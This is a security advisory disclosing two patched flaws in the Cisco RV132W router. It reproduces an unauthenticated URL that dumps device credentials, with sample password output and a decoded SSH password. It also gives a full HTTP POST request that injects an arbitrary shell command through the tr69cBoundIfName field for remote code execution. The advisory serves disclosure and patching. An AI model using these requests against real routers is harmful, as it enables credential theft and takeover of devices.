SSD Advisory – Hack2Win – Cisco RV132W Multiple Vulnerabilities

Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8
The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.”
The vulnerabilities found are:

  • Information Disclosure That Leads to Password Disclosure
  • Unauthenticated WAN Remote Code Execution

Credit
A security researcher from, NSHC, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
Cisco were informed of the vulnerabilities and released patches to address them: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x
CVE: CVE-2018-0125 / CVE-2018-0127

Vulnerabilities details
Information Disclosure that Leads to Password Disclosure
User controlled input is not sufficiently filtered, unauthenticated user can access the following page:

http://[TARGET_IP]/dumpmdm.cmd

The output will include the admin SSH password (base64)

<AdminUserName>redalert</AdminUserName>
 <AdminPassword>61eac78956b08e9b7c499691eddbe2e2</AdminPassword>
 <AdminPasswordHash>(null)</AdminPasswordHash>
 <AdminCliEnable>TRUE</AdminCliEnable>
 <SupportUserName>support</SupportUserName>
 <SupportPassword>support</SupportPassword>
 <SupportPasswordHash>(null)</SupportPasswordHash>
 <SupportCliEnable>TRUE</SupportCliEnable>
 <UserUserName>user</UserUserName>
 <UserPassword>user</UserPassword>
 <UserPasswordHash>(null)</UserPasswordHash>
 <UserCliEnable>TRUE</UserCliEnable>
 <logintimeout>30</logintimeout>
 <SetAdminUser>TRUE</SetAdminUser>
 <SetGuestUser>FALSE</SetGuestUser>
 <EnableAdminUser>TRUE</EnableAdminUser>
 <EnableGuestUser>FALSE</EnableGuestUser>
 <GuestUserName>guest</GuestUserName>
 <GuestPassword>574ea313a3b02211d193d01606942111</GuestPassword>
 <GuestPasswordHash>(null)</GuestPasswordHash>
 <GuestCliEnable>TRUE</GuestCliEnable>
 <GuestUserIsInUse>FALSE</GuestUserIsInUse>
 <FirstLogin>TRUE</FirstLogin>
 <GuestLoginTimeout>30</GuestLoginTimeout>
 <loginchecked>0</loginchecked>
 <sshpass>cmVkYWxlcnQxMzIkAA==</sshpass>

Decoding: “cmVkYWxlcnQxMzIkAA==” base64 decodes to “redalert132$” which is our test unit password.
Unauthenticated WAN Remote Code Execution
User controlled input is not sufficiently filtered, unauthenticated user can access the following page:

http://[TARGET_IP]/tr69cfg.cgi

By sending POST request with modify parameter tr69cBoundIfName= an unauthenticated user can execute arbitrary code on the victims router

===
POST /tr69cfg.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/2010010
1 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 627
Referer: http://192.168.1.1/tr69cfg.cgi
Connection: close
Upgrade-Insecure-Requests: 1
submit_button=Basic_config&tr69cEnable=1&tr69cInformEnable=1&ipvEnable=0&tr69cInformInterval=300&tr69cAcsURL=http%3A%2F%2F192.168.1.1&tr69cAcsUser=admin&tr69cAcsPwd=admin&tr69cConnReqUser=admin&tr69cConnReqPwd=admin&tr69cConnReqPort=7547&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0&tr69cAcsCert=&tr69cCpeCert=&downloadFileType=&tr69cBoundIfName=;COMMAND-TO-RUN;&tr69cBindInterface=ETH_WAN_R&tr69=on&ipv=on&inform=on&informInterval=300&httpCategory=http%3A%2F%2F&acsURL=192.168.1.1&acsUser=admin&acsPwd=admin&debug=on&FileType=on&connReqAuth=on&connReqUser=admin&connReqPwd=admin&connReqPort=7547&WANInterface=eth0.1
===